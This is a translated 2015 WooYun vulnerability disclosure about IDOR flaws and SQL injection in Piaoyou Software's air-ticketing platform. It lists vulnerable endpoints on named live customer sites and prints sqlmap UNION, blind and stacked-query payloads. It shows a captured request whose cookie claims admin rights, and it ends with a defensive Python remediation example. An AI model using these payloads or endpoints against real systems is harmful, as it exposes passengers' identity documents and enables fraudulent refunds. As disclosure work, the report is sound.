Vulnerability summary

Defect ID: wooyun-2015-0102525

Vulnerability title: Generic five unauthorized-access (IDOR) flaws and six SQL injections in a third-party ticketing system leak large volumes of order information (name, mobile number, ID number, flight number, departure time, etc.)

Affected vendor: 票友软件 (Piaoyou Software)

Vulnerability author: 路人甲

Submitted: 2015-03-23 10:18

Fix deadline: 2015-05-07 10:20

Published: 2015-05-07 10:20

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Vulnerability status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2015-03-23: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed
2015-05-07: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Unauthorized access allows refunding tickets, viewing passenger information, etc.
SQL injection, summarised: supports UNION and leaks payment details

Detailed description:

http://www.piaoyou.org/case_web.htm lists Piaoyou Software's customer deployments
Unauthorized access and injection, 10 endpoints in total, bundled together:

1./Order/detail.aspx?id=38207
2./Order/Return_detail.aspx?id=37395&sid=59689
3./Order/view_detail.aspx?id=22141&sid=35171
4./Order/history_flight.aspx?id=3821
5./Financial/fksq_meb_mx.aspx?id=57
6./Json_db/flight_report.aspx?stype=&ptype=&ddw=1&sdate=2010-03-19&edate=2015-3-19&fs=&keyword=&col=id,sdate,ckbm,pnr,cjr,chahc,pnum,hb,cw,qfdate,price,shui,bxmoney,dtotal,bymoney,qianprice,tuimoney,kefu,lxr&_search=false&nd=1426769311306&rows=25&page=1&sidx=id&sord=desc


You need to register a user; when registering, set every field marked * to 13900000000 for quick registration.

Proof of vulnerability:

Case 1. http://www.h-h.com.cn/
Five unauthorized-access flaws
1. http://www.h-h.com.cn/Order/detail.aspx?id=38207: iterating over id retrieves every ticket-holder's information, including name, ID-card number, ticket number and departure time, and also allows unauthorized actions such as requesting a refund

2. http://www.h-h.com.cn/Order/view_detail.aspx?id=22141&sid=35171: id can likewise be iterated

3. http://www.h-h.com.cn/Order/Return_detail.aspx?id=37395&sid=59689: id can likewise be iterated

4. http://www.h-h.com.cn/Order/history_flight.aspx?id=3821

5. http://www.h-h.com.cn/Financial/fksq_meb_mx.aspx?id=57

Six injections:
1. http://www.h-h.com.cn/Order/detail.aspx?id=38207: the request has to be captured, similar to the one below; save it to a txt file and it can be injected

GET /Order/detail.aspx?id=38207 HTTP/1.1
Host: www.h-h.com.cn
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: ASP.NET_SessionId=5hpnmhuxo0g0kp5is1xxyxxm; tktcookie=memberid=648&truename=15100000000&level=%e5%85%ac%e5%8f%b8%e5%ae%a2&yhzc=0&gjyhzc=0&yhfs=3&logo=&sh=0&bm=&username=Administrator&shgroup=admin&dbgroup=admin&flag=admin


2. http://www.h-h.com.cn/Order/Return_detail.aspx?id=37395&sid=59689: supports UNION

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=37395 AND 2068=2068&sid=59689
Type: UNION query
Title: Generic UNION query (NULL) - 16 columns
Payload: id=37395 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(66)+CHAR(72)+CHAR(97)+CHAR(77)+CHAR(70)+CHAR(69)+CHAR(113)+CHAR(89)+CHAR(100)+CHAR(84)+CHAR(113)+CHAR(98)+CHAR(98)+CHAR(113)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &sid=59689
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=37395; WAITFOR DELAY '0:0:5'--&sid=59689
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=37395 WAITFOR DELAY '0:0:5'--&sid=59689
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
Database: haihua_pek


60,000+ payment details exposed

Database: haihua_pek
Table: pnrdetail
[1 entry]


3. http://www.h-h.com.cn/Order/Return_detail.aspx?id=37395&sid=59689

4. http://www.h-h.com.cn/Order/history_flight.aspx?id=3821

5. http://www.h-h.com.cn/Financial/fksq_meb_mx.aspx?id=57

6.http://www.h-h.com.cn/Json_db/flight_report.aspx?stype=&ptype=&ddw=1&sdate=2010-03-19&edate=2015-3-19&fs=&keyword=&col=id,sdate,ckbm,pnr,cjr,chahc,pnum,hb,cw,qfdate,price,shui,bxmoney,dtotal,bymoney,qianprice,tuimoney,kefu,lxr&_search=false&nd=1426769311306&rows=25&page=1&sidx=id&sord=desc

Case 2. http://www.4008836868.com/
1. http://www.4008836868.com/Order/detail.aspx?id=38207: iterating over id retrieves every ticket-holder's information, including name, passport and visa, ticket number and departure time, and also allows unauthorized actions such as requesting a refund

2. http://www.4008836868.com/Order/view_detail.aspx?id=11190&sid=35171: id can likewise be iterated

3. http://www.4008836868.com/Order/Return_detail.aspx?id=3700&sid=59689: id can likewise be iterated

Six injections:
1. http://www.4008836868.com/Order/detail.aspx?id=38207

2. http://www.4008836868.com/Order/view_detail.aspx?id=11190&sid=35171

3. http://www.4008836868.com/Order/Return_detail.aspx?id=3700&sid=59689: supports UNION

4. http://www.4008836868.com/Order/history_flight.aspx?id=3821

5. http://www.4008836868.com/Financial/fksq_meb_mx.aspx?id=57

6.http://www.4008836868.com/Json_db/flight_report.aspx?stype=&ptype=&ddw=1&sdate=2010-03-19&edate=2015-3-19&fs=&keyword=&col=id,sdate,ckbm,pnr,cjr,chahc,pnum,hb,cw,qfdate,price,shui,bxmoney,dtotal,bymoney,qianprice,tuimoney,kefu,lxr&_search=false&nd=1426769311306&rows=25&page=1&sidx=id&sord=desc

Case 3. http://hhcl.h-h.com.cn/
Five unauthorized-access flaws
1. http://hhcl.h-h.com.cn/Order/detail.aspx?id=38207: iterating over id retrieves every ticket-holder's information, including name, ID-card number, ticket number and departure time, and also allows unauthorized actions such as requesting a refund

2. http://hhcl.h-h.com.cn/Order/view_detail.aspx?id=22141&sid=35171: id can likewise be iterated

3. http://hhcl.h-h.com.cn/Order/Return_detail.aspx?id=37395&sid=59689: id can likewise be iterated

4. http://hhcl.h-h.com.cn/Order/history_flight.aspx?id=3821

5. http://hhcl.h-h.com.cn/Financial/fksq_meb_mx.aspx?id=57

Six injections:
1. http://hhcl.h-h.com.cn/Order/detail.aspx?id=38207: the request has to be captured (identical to the one shown for case 1); save it to a txt file and it can be injected



2. http://hhcl.h-h.com.cn/Order/Return_detail.aspx?id=37395&sid=59689: supports UNION (sqlmap output identical to case 1)



3. http://hhcl.h-h.com.cn/Order/Return_detail.aspx?id=37395&sid=59689

4. http://hhcl.h-h.com.cn/Order/history_flight.aspx?id=3821

5. http://hhcl.h-h.com.cn/Financial/fksq_meb_mx.aspx?id=57

6.http://hhcl.h-h.com.cn/Json_db/flight_report.aspx?stype=&ptype=&ddw=1&sdate=2010-03-19&edate=2015-3-19&fs=&keyword=&col=id,sdate,ckbm,pnr,cjr,chahc,pnum,hb,cw,qfdate,price,shui,bxmoney,dtotal,bymoney,qianprice,tuimoney,kefu,lxr&_search=false&nd=1426769311306&rows=25&page=1&sidx=id&sord=desc


Remediation:

Unauthorized access: validate ownership against the session
Injection: cast the id parameter to an integer; match the stype parameter against the fixed set of keywords the feature actually supports
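The two remediation points above, worked through as an added example that is not code from 票友软件 or from the original report: a hardened stand-in for an id-keyed order page and for the keyword-filtered flight_report endpoint. It models the database with an in-memory sqlite3 table, assumes the logged-in memberid is already held in a server-side session, and invents the stype keyword list and the sample rows.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the vendor's schema: table and column names
# (pnrdetail, id, memberid, cjr, hb, sdate, stype) are from the sqlmap output
# above; the rows and the date format are invented sample data.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE pnrdetail (id INTEGER PRIMARY KEY, memberid INTEGER,
                                cjr TEXT, hb TEXT, sdate TEXT, stype TEXT);
        INSERT INTO pnrdetail VALUES (38207, 648, 'Wei **', 'CA8905', '2014-06-01', '已出票');
        INSERT INTO pnrdetail VALUES (38208, 901, 'Li **', 'MU5101', '2014-06-02', '已出票');
        INSERT INTO pnrdetail VALUES (38209, 648, 'Wei **', 'CZ3101', '2014-06-03', '未出票');
    """)
    return db

class BadRequest(Exception): pass
class Forbidden(Exception): pass

# Hypothetical keyword table for flight_report's stype: each accepted keyword
# maps to a fixed SQL fragment, so user-supplied text never reaches the query.
STYPE_FILTERS = {"": "", "issued": " AND stype = '已出票'",
                 "unissued": " AND stype = '未出票'"}
DATE_RE = re.compile(r"[0-9]{4}-[0-9]{1,2}-[0-9]{1,2}")

def parse_id(raw):
    # Injection fix: id must be a bare integer, so "38207 AND 2068=2068" or
    # "38207; WAITFOR DELAY '0:0:5'--" are refused before any SQL is built.
    if raw is None or not re.fullmatch(r"[0-9]{1,10}", raw):
        raise BadRequest("id must be an integer")
    return int(raw)

def order_detail(db, session_memberid, raw_id):
    # Hardened stand-in for /Order/detail.aspx?id=...; session_memberid comes
    # from the server-side session, not from a client-supplied cookie field.
    row = db.execute("SELECT id, memberid, cjr, hb, sdate FROM pnrdetail WHERE id = ?",
                     (parse_id(raw_id),)).fetchone()  # parameterised, not concatenated
    # IDOR fix: refuse orders owned by another member. Missing and foreign orders
    # get the same answer, so iterating id reveals nothing about other members.
    if row is None or row[1] != session_memberid:
        raise Forbidden("order is not visible to this session")
    return {"id": row[0], "cjr": row[2], "hb": row[3], "sdate": row[4]}

def flight_report(db, session_memberid, stype, sdate, edate):
    # Hardened stand-in for /Json_db/flight_report.aspx?stype=&sdate=&edate=...
    if stype not in STYPE_FILTERS:
        raise BadRequest("unknown stype")
    if not (DATE_RE.fullmatch(sdate) and DATE_RE.fullmatch(edate)):
        raise BadRequest("dates must be YYYY-MM-DD")
    sql = ("SELECT id, hb, sdate FROM pnrdetail WHERE memberid = ? AND sdate "
           "BETWEEN ? AND ?" + STYPE_FILTERS[stype] + " ORDER BY id")
    return db.execute(sql, (session_memberid, sdate, edate)).fetchall()

def rejects(fn, *args):
    # Helper for callers and tests: True when the handler refuses the request.
    try:
        fn(*args)
    except (BadRequest, Forbidden):
        return True
    return False
```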

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively refused

Vulnerability Rank: 15 (WooYun rating)